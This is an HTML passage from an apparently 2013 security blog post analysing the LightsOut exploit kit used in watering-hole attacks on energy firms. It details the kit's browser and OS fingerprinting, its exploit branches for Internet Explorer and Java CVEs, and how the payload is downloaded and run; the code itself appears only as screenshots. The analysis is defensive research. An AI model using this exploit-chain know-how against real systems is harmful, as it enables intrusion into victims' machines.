<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Not implemented</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>Java JAR - <a href="https://www.virustotal.com/en/file/bfe1ba7b5082b8c3f2cffdd3e0e015437c7886f79737fad201dc27b54ea798a0/analysis/" rel="nofollow" target="_blank">virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>No sample available</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>Possibly originated from Turkey or
the author speaks Turkish</pre>
</td>
</tr>
</tbody></table>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-89930315590441058162013-09-29T22:09:00.000+01:002013-10-14T13:32:07.882+01:00LightsOut EK: "By the way... How much is the fish!?"Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing details about this Exploit Kit.<br />
<br />
<i><u>Update 2013-10-14:</u></i><br />
Thanks to <a href="https://twitter.com/tlansec" rel="nofollow" target="_blank">@tlansec</a> for identifying this EK - LightsOut.<br />
<br />
NOTE: Information is based on the sample captured on 2013-09-27<br />
<br />
<a href="http://blogs.cisco.com/author/emmanueltacheau/" rel="nofollow" target="_blank">Emmanuel Tacheau</a> a Threat Researcher at Cisco <a href="http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/" rel="nofollow" target="_blank">shared</a> his findings on this Exploit Kit in his latest blog post linking it to a watering-hole type of attack aimed at Energy & Oil Industries. Below is the list of target types he identified:<br />
<ul>
<li>An oil and gas exploration firm with operations in Africa, Morocco, and Brazil;</li>
<li>A company that owns multiple hydro electric plants throughout the Czech Republic and Bulgaria;</li>
<li>A natural gas power station in the UK;</li>
<li>A gas distributor located in France;</li>
<li>An industrial supplier to the energy, nuclear and aerospace industries;</li>
<li>Various investment and capital firms that specialize in the energy sector.</li>
</ul>
Originally thinking that this Exploit Kit must be a state of art code with all possible obfuscation in the world applied (taking the target types into account), I was a little bit disappointed to see another '<span style="color: #3d85c6;">somehow-somewhat</span>' job - unused code, copy-paste from '<span style="color: #3d85c6;">packetstormsecurity.com</span>', almost no Java code obfuscation, no use of encryption or encoding, etc.<br />
<br />
<b><span style="color: #3d85c6;">"It's the first page of the second chapter"</span></b><br />
<br />
The below pattern is specific to this particular EK sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ0iBV4amqH3TZXIwnEThvxN_l2xkwlvNa25-k2KFf4OhEh8L764e180AD32cbrZ8ES60dS_-OdqJ6UBOKUaDqpBwOsfwjkOfIZHFLWUNMqQzJS_PhuXZcFEy-oTIy89A7Lgaw0eWMHFCN/s1600/Unknown-2013-09-27_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ0iBV4amqH3TZXIwnEThvxN_l2xkwlvNa25-k2KFf4OhEh8L764e180AD32cbrZ8ES60dS_-OdqJ6UBOKUaDqpBwOsfwjkOfIZHFLWUNMqQzJS_PhuXZcFEy-oTIy89A7Lgaw0eWMHFCN/s1600/Unknown-2013-09-27_URL_pattern.png" width="320" /></a></div>
<br />
There are 2 layers of landing pages. The first landing page is a single '<span style="color: #3d85c6;"><iframe></span>' loading the second landing page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga7IH7GKivxRlb1QvyjarfGhF0ccT0ebDJ7mNNLDJ3XMfR27UvJKytwvt-cNEirxCmKjroaiCxQybLvxgWZV8BasiNxuBegpTok8M-ZHoni2CUo_gcyCuS_x48ZTL3pZev0A2pJKmyYYfU/s1600/Unknown-2013-09-27_first_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga7IH7GKivxRlb1QvyjarfGhF0ccT0ebDJ7mNNLDJ3XMfR27UvJKytwvt-cNEirxCmKjroaiCxQybLvxgWZV8BasiNxuBegpTok8M-ZHoni2CUo_gcyCuS_x48ZTL3pZev0A2pJKmyYYfU/s1600/Unknown-2013-09-27_first_landing.png" width="320" /></a></div>
<br />
The JavaScript on the second landing page will try to identify the following components before proceeding with any exploit attempts.<br />
<ul>
<li>Internet browser type</li>
<li>Internet browser version</li>
<li>Operating System version</li>
<li>Operating System type (32/64 bit)</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6AHU03CkRFfLxfizW_lrDveHrfRqygt7e7v2-yqO-PqFOwoxzKFrGt8kJyX_xpd5dGBI1oTBY1YayG_iR8oY2A4fDTpCNcHjRljoy7lBRNC88wFW9GS30kJps3rTebpFtjulUHMAB3wl/s1600/Unknown-2013-09-27_variables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip6AHU03CkRFfLxfizW_lrDveHrfRqygt7e7v2-yqO-PqFOwoxzKFrGt8kJyX_xpd5dGBI1oTBY1YayG_iR8oY2A4fDTpCNcHjRljoy7lBRNC88wFW9GS30kJps3rTebpFtjulUHMAB3wl/s1600/Unknown-2013-09-27_variables.png" width="320" /></a></div>
<i><span style="font-size: x-small;">variables that hold gathered values</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJn_k368PV4UqprjjrkOeCrwD3OOIKkptuKr_Iv5JvfJrage6OOvtToJKqFD7COw6CX0d_KEJw_GW5hX1EvDQgJR87zCn6rH-aXqQiSZW4V_MOGy1HdDk2EQZl7N3YXubXfUKL1pDVU_h/s1600/Unknown-2013-09-27_browser_type_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTJn_k368PV4UqprjjrkOeCrwD3OOIKkptuKr_Iv5JvfJrage6OOvtToJKqFD7COw6CX0d_KEJw_GW5hX1EvDQgJR87zCn6rH-aXqQiSZW4V_MOGy1HdDk2EQZl7N3YXubXfUKL1pDVU_h/s1600/Unknown-2013-09-27_browser_type_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">browser type check - '<span style="color: #3d85c6;">BkEvhdwRlG</span>' hold the UA string</span></i></div>
<br />
The function(screenshot above) returns one of the following values - '<span style="color: #3d85c6;">msie</span>', '<span style="color: #3d85c6;">opera</span>' or '<span style="color: #3d85c6;">firefox</span>'. It's worth noting that '<span style="color: #3d85c6;">opera</span>' value is not being used in any conditions or anywhere else in the code. Code leftovers? Future plans?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9IH2yMR4XhJDlI5Ui-ari-NZcQOOD881vraFZCl3LAWjXB20bxGwwnJttRCVgu-hV52fvctghyphenhyphen16AvlAYKYZB9G2IY9ZDqgXKP1cdjM34vAdRqN7lrCN9L4pPJeSTPtyJSaLN72MRLQi7/s1600/Unknown-2013-09-27_browser_version_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9IH2yMR4XhJDlI5Ui-ari-NZcQOOD881vraFZCl3LAWjXB20bxGwwnJttRCVgu-hV52fvctghyphenhyphen16AvlAYKYZB9G2IY9ZDqgXKP1cdjM34vAdRqN7lrCN9L4pPJeSTPtyJSaLN72MRLQi7/s1600/Unknown-2013-09-27_browser_version_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">browser version check</span></i></div>
<br />
Another unused code branch here. Even though Firefox browser version is being identified, the value is not used anywhere else in the code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihqtHCU8Wip5BJJZRJKvcK4812kmY02iTRxwUpN6XEIg1o-p24JpE7QDkEV65Gp0cmANqXDxK9EeaWP4z5OAjsNo7RjvGXzeITs6hUfr02Jn6MnzMSG1WJh-8aRHFtnEHB3jSBok2jzoOc/s1600/Unknown-2013-09-27_os_version_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihqtHCU8Wip5BJJZRJKvcK4812kmY02iTRxwUpN6XEIg1o-p24JpE7QDkEV65Gp0cmANqXDxK9EeaWP4z5OAjsNo7RjvGXzeITs6hUfr02Jn6MnzMSG1WJh-8aRHFtnEHB3jSBok2jzoOc/s1600/Unknown-2013-09-27_os_version_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">OS version check</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW86vsZuq1p9FYllQxuceSHoMB1ICXNX5tyuV103GLpojGh4QgfatScNTmf4av_U51ej3yvpN9ww3TpypyA4tr0JVdru7zCXuZ_CnT0uCSQxybQR3kL8xGJ5hqFeTbipsmmbycgAfrrWNk/s1600/Unknown-2013-09-27_os_type_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgW86vsZuq1p9FYllQxuceSHoMB1ICXNX5tyuV103GLpojGh4QgfatScNTmf4av_U51ej3yvpN9ww3TpypyA4tr0JVdru7zCXuZ_CnT0uCSQxybQR3kL8xGJ5hqFeTbipsmmbycgAfrrWNk/s1600/Unknown-2013-09-27_os_type_check.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">OS type check</span></i></div>
<br />
Yet again, the OS type is being identified, but the value is not used. It's quite possible that the content of the second landing page is being generated on the fly and depending on some conditions parts of the code are chosen. If that's the case they need to work on the generation logic. Below are other samples of some '<span style="color: #3d85c6;">dead</span>' code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-xeyTNIQM9gk4EwZFViRkBTk4jgmBCzrsxGQwc9-CVSzq9wxUCOmKaLPgYI6apBPFOGEW1-vVgDwVLToglxjHQ7D0JeSl5_FvQa9YzVDogwAjyAEvvnyIyr5DsHNxjF9RRFe_rkgegC8/s1600/Unknown-2013-09-27_adobe_check.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG-xeyTNIQM9gk4EwZFViRkBTk4jgmBCzrsxGQwc9-CVSzq9wxUCOmKaLPgYI6apBPFOGEW1-vVgDwVLToglxjHQ7D0JeSl5_FvQa9YzVDogwAjyAEvvnyIyr5DsHNxjF9RRFe_rkgegC8/s1600/Unknown-2013-09-27_adobe_check.png" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">function to check Adobe Reader plugin version</span></i></div>
<br />
The function above is never called.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwuiKvPjuDzlCC60IhwdWxrX08ikbVs-VAIy-AejGubqpsnkScT6xJkwCGj-HV9K3z0N8F1hJQfEdEgGxdipzzWyI3JT5WlK8BygQmVOS7-KnrbbV90vJLIHbazHFX049AkG7rw3x3O9M/s1600/Unknown-2013-09-27_adobe_flow_logic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwuiKvPjuDzlCC60IhwdWxrX08ikbVs-VAIy-AejGubqpsnkScT6xJkwCGj-HV9K3z0N8F1hJQfEdEgGxdipzzWyI3JT5WlK8BygQmVOS7-KnrbbV90vJLIHbazHFX049AkG7rw3x3O9M/s1600/Unknown-2013-09-27_adobe_flow_logic.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">execution control code based on Adobe Reader version detected</span></i></div>
<br />
If Adobe infection vector would be used the code above controls the execution flow.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiiv4T4_6KdU6bgNlQrYc304G83fZBGP9-L4iFkLAi8CXR7Xr04xNltpDoSZlbCxXZ5zCkgrbA2d6VR1j6dyHsZF2VMUdhIrmVbGeChyphenhyphenJBA2fqhmWFFINifkfFkL7OAlnXF9GDZ_yUNalO/s1600/Unknown-2013-09-27_adobe_exploit_branches.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiiv4T4_6KdU6bgNlQrYc304G83fZBGP9-L4iFkLAi8CXR7Xr04xNltpDoSZlbCxXZ5zCkgrbA2d6VR1j6dyHsZF2VMUdhIrmVbGeChyphenhyphenJBA2fqhmWFFINifkfFkL7OAlnXF9GDZ_yUNalO/s1600/Unknown-2013-09-27_adobe_exploit_branches.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">three possible Adobe exploit branches</span></i></div>
<br />
Currently empty, but if armed the three functions will be targeting Adobe Reader plugin versions '<span style="color: #3d85c6;">9.3.4</span>', '<span style="color: #3d85c6;">9.4.0</span>' and '<span style="color: #3d85c6;">10.1</span>'.<br />
<br />
Once Internet browser and Operating System types and versions are identified, one of the following code branches will be taken.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjZUQZXd3G1FvMnHQSu-Oem7LRpydY3YIWhCoF-Ps5j2VqgJxAxY89LcSr_2HpkADgi6kvgqo9nnoK0an3qB2RZ3Nc44h3koSATZp6faNld_hjim_SbF-H3iIIVvL6qCltiq7ESjaZ6mLR/s1600/Unknown-2013-09-27_IE7_exploit_branch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjZUQZXd3G1FvMnHQSu-Oem7LRpydY3YIWhCoF-Ps5j2VqgJxAxY89LcSr_2HpkADgi6kvgqo9nnoK0an3qB2RZ3Nc44h3koSATZp6faNld_hjim_SbF-H3iIIVvL6qCltiq7ESjaZ6mLR/s1600/Unknown-2013-09-27_IE7_exploit_branch.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">IE7 on XP or W2K or W2K3</span></i></div>
<br />
Exploit code for IE7 on XP or W2K or W2K3 will be called following a request for malicious JAR file. I couldn't identify the IE7 exploit used in this instance and would appreciate the community help on it. The code is posted on <a href="http://pastebin.com/djKqZi9B" rel="nofollow" target="_blank">pastebin.com</a>. Please contact me on Twitter or email if you have any information.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdYBDWg77wuJR-Qxxc-lGt5SmnuoLT7VnhEULzdO5NgJ0SUBxq6sxKavvgBePi_dX8kjtwuVB3-yMvd84ams8xGul3QOB7gwwbYLyjVdWfPytU46Lec68Jq2OaGTZN5ixvJW2969VKwfvl/s1600/Unknown-2013-09-27_IE8_exploit_branch.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdYBDWg77wuJR-Qxxc-lGt5SmnuoLT7VnhEULzdO5NgJ0SUBxq6sxKavvgBePi_dX8kjtwuVB3-yMvd84ams8xGul3QOB7gwwbYLyjVdWfPytU46Lec68Jq2OaGTZN5ixvJW2969VKwfvl/s1600/Unknown-2013-09-27_IE8_exploit_branch.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">IE8 on XP or W2K or W2K3</span></i></div>
<br />
<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1347" rel="nofollow" target="_blank">CVE-2013-1347</a> is targeted if IE8 on XP or W2K or W2K3 is detected. Malicious JAR will be requested after IE8 exploit attempt. The last condition is a '<span style="color: #3d85c6;">safety net</span>' - targets all other types of Internet browsers with Java plugin enabled.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEiBrBmCEUKyagZsvSGqFmBhG-HsToaiOilGTipO4tL1iGVdwJ0zNrhnvgfJyZRIu1hegyYPwaWx-JTlfwTqrSna67PyVQzIy6EUPcL9rKVNNHshFfeSK3Exssj7m9qFD-Z_Zm8pRUVrah/s1600/Unknown-2013-09-27_all_other.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEiBrBmCEUKyagZsvSGqFmBhG-HsToaiOilGTipO4tL1iGVdwJ0zNrhnvgfJyZRIu1hegyYPwaWx-JTlfwTqrSna67PyVQzIy6EUPcL9rKVNNHshFfeSK3Exssj7m9qFD-Z_Zm8pRUVrah/s1600/Unknown-2013-09-27_all_other.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">all other browser + Java</span></i></div>
<br />
Malicious JAR file is selected using the simple logic below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMHKvo8W1CaQGEKRcg6zADBuWi7rv1a-nfDr25wdOK6aubzcFIKX1PEhU2QiMn5K9uU1Zx5I_UBmuVjTe9KIVRsAwm6eqpMGO_rgW_JYYK7jRKskdsuw9A3nwsUR4Q-M0-A6AulRo8q6Qi/s1600/Unknown-2013-09-27_JAR_selection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="84" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMHKvo8W1CaQGEKRcg6zADBuWi7rv1a-nfDr25wdOK6aubzcFIKX1PEhU2QiMn5K9uU1Zx5I_UBmuVjTe9KIVRsAwm6eqpMGO_rgW_JYYK7jRKskdsuw9A3nwsUR4Q-M0-A6AulRo8q6Qi/s1600/Unknown-2013-09-27_JAR_selection.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JAR selection logic</span></i></div>
<br />
There are 2 JAR files to choose from - for Java 6 or for Java 7. Just as simple as that - no patch level checks, no narrowing the attack surface to increase the success rate and reduce the detection chance. This logic is probably dictated by the choice of Java vulnerabilities targeted - '<span style="color: #3d85c6;">CVE-2012-1723(Java 6)</span>' and '<span style="color: #3d85c6;">CVE-2013-2465(Java 7)</span>'. In both cases the call for a JAR file is implemented through a GET request for an HTML page that would have an '<span style="color: #3d85c6;"><applet></span>' to pull the JAR file down.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEM2muT2TzFoGMy2iAcYsBfuEcEH457HKBBIE1AyVJ8KECMqXLnB8bjJCg1YKvZvw2US9gh4fN64Ml2sba0w4bHEw8rNWRO17woG-oViISZZgSlrFgg7kSFYrt6e7LGX9D7EuGdYCOL3nE/s1600/Unknown-2013-09-27_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEM2muT2TzFoGMy2iAcYsBfuEcEH457HKBBIE1AyVJ8KECMqXLnB8bjJCg1YKvZvw2US9gh4fN64Ml2sba0w4bHEw8rNWRO17woG-oViISZZgSlrFgg7kSFYrt6e7LGX9D7EuGdYCOL3nE/s1600/Unknown-2013-09-27_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">requesting JAR files through a separate HTML pages</span></i></div>
<br />
The content of HTML pages for both Java 6 and 7 paths is quite simple - a single '<span style="color: #3d85c6;"><applet></span>' to request a JAR file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipm1hT4FLagK4Jnlxj1z1gCL1m0frNuUAn_Awnq52ZmJTOEfGqQHhKo8lhKLLq7IbEef-AXLePzzmXEkgR8kF69LnualHn6c8QttI6TWmKtdqLSjvQNuEggPMbL2MSfF7CNI9qwH3c9453/s1600/Unknown-2013-09-27_Java6_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="39" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipm1hT4FLagK4Jnlxj1z1gCL1m0frNuUAn_Awnq52ZmJTOEfGqQHhKo8lhKLLq7IbEef-AXLePzzmXEkgR8kF69LnualHn6c8QttI6TWmKtdqLSjvQNuEggPMbL2MSfF7CNI9qwH3c9453/s1600/Unknown-2013-09-27_Java6_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Java 6 JAR request</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdg0WiNxicJyzkF6gHs93X3SsptnIJ4fAeuWkhdhdQ-CLW6qbON418Ua6QM8RU_2DpKj2tZn1z-UeYMORO6miOFA8E5vJKa4OCnPrj2dVrkriIdQGzyNujjzsCbE1mASkeg7fNJBatQq0w/s1600/Unknown-2013-09-27_Java7_JAR_request.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdg0WiNxicJyzkF6gHs93X3SsptnIJ4fAeuWkhdhdQ-CLW6qbON418Ua6QM8RU_2DpKj2tZn1z-UeYMORO6miOFA8E5vJKa4OCnPrj2dVrkriIdQGzyNujjzsCbE1mASkeg7fNJBatQq0w/s1600/Unknown-2013-09-27_Java7_JAR_request.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Java 7 JAR request</span></i></div>
<br />
I can't think of a good enough reason to request the JAR files through an additional HTML page. The author hasn't leant how to do it using JavaScript yet? That actually can also explain why there is no JNLP file used to launch Java 7 JAR file - it's probably in the last chapters of the book the author is reading as he/she is learning Web Programming.<br />
<br />
<b><span style="color: #3d85c6;">"The chase is better than the catch!"</span></b><br />
<br />
With the exception to some naming of some .class files, there is no obfuscation applied to Java source code or bytecode. Most of the methods and variables are meaningfully named. No parameters are passed to JVM running the JAR file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtoIsz1_bDWZ-wAV-NKar2G4Mb1H7_tl2QMIFP6jHdkm4Lqdj9sLzyEfR9TObhoyEj5EQFnfPqP4mnkiDA9cyUVjlcMmeO7tyz0wUVtT8OKnuGvTWdfXD5NOKAxllaW1SMDXARt5YoQaGt/s1600/Unknown-2013-09-27_CVE-2012-1723.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtoIsz1_bDWZ-wAV-NKar2G4Mb1H7_tl2QMIFP6jHdkm4Lqdj9sLzyEfR9TObhoyEj5EQFnfPqP4mnkiDA9cyUVjlcMmeO7tyz0wUVtT8OKnuGvTWdfXD5NOKAxllaW1SMDXARt5YoQaGt/s1600/Unknown-2013-09-27_CVE-2012-1723.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of exploit code for '<span style="color: #3d85c6;">CVE-2012-1723</span>'</span></i></div>
<br />
Java 6 JAR file attempts to exploit '<span style="color: #3d85c6;">CVE-2012-1723</span>' and if successful proceeds to download the Initial Payload from hardcoded URL.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSjb_zQRjSY20Hf2qf6yi4McQjKUkDcf4Py1WixBzLltN2JfX-iN57auU4xd2ZfxsJt6UJ7-fxFrRND1oeGDtW0kPtb1BVYm4_nOS5wPQuEi3J_sd0jWHdxvV1af24D4kMYOKhH8XI3vHZ/s1600/Unknown-2013-09-27_Java6_hardcoded_URL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSjb_zQRjSY20Hf2qf6yi4McQjKUkDcf4Py1WixBzLltN2JfX-iN57auU4xd2ZfxsJt6UJ7-fxFrRND1oeGDtW0kPtb1BVYm4_nOS5wPQuEi3J_sd0jWHdxvV1af24D4kMYOKhH8XI3vHZ/s1600/Unknown-2013-09-27_Java6_hardcoded_URL.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Initial Payload URL + store location + filename</span></i></div>
<br />
The Initial Payload will be stored in Java Temp folder with hardcoded filename - '<span style="color: #3d85c6;">TMPprovider0.dll</span>'. The payload is executed with the following code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJQ5iBFYguiXUewcqfM1-XZxVf4U30aR495G8-S3H_1OwbTTr2Mm6AL-oil8RPBfc8WBQL7xsDHOtUnPlUPC3TONjgrE9QYe41lh5FgjxLheuK7JL2kfyNLYD6nrAsXRyj9U2-MxfWJxb5/s1600/Unknown-2013-09-27_Java6_execution.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJQ5iBFYguiXUewcqfM1-XZxVf4U30aR495G8-S3H_1OwbTTr2Mm6AL-oil8RPBfc8WBQL7xsDHOtUnPlUPC3TONjgrE9QYe41lh5FgjxLheuK7JL2kfyNLYD6nrAsXRyj9U2-MxfWJxb5/s1600/Unknown-2013-09-27_Java6_execution.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Initial Payload execution code</span></i></div>
<br />
That's pretty much all functionality included in Java 6 JAR file. Java 7 JAR is as straight to the business as the Java 6 one only with 1 extra step though. The execution starts with a slightly modified '<span style="color: #3d85c6;">CVE-2013-2465</span>' exploit code copied from '<span style="color: #3d85c6;">packetstormsecurity.com</span>' advisory.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcc5no8gVjEUifyXPc0IZWD4XUjXlGRsKriBSmdsfGpSyYPFp6kx0608dQ4WPEif6SJ-49Ywa8bYlolMQwgqTZGg_ELpicgVx2SJ0sJVNsARz7Vf7vjNeI2ZLbu9bFs7Gs9Wonf5W9V9VI/s1600/Unknown-2013-09-27_CVE-2013-2465.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcc5no8gVjEUifyXPc0IZWD4XUjXlGRsKriBSmdsfGpSyYPFp6kx0608dQ4WPEif6SJ-49Ywa8bYlolMQwgqTZGg_ELpicgVx2SJ0sJVNsARz7Vf7vjNeI2ZLbu9bFs7Gs9Wonf5W9V9VI/s1600/Unknown-2013-09-27_CVE-2013-2465.png" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of exploit code for '<span style="color: #3d85c6;">CVE-2013-2465</span>'</span></i></div>
<br />
The Initial Payload is downloaded through the same URL and will be stored in the same location with the same filename as in Java 6 sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
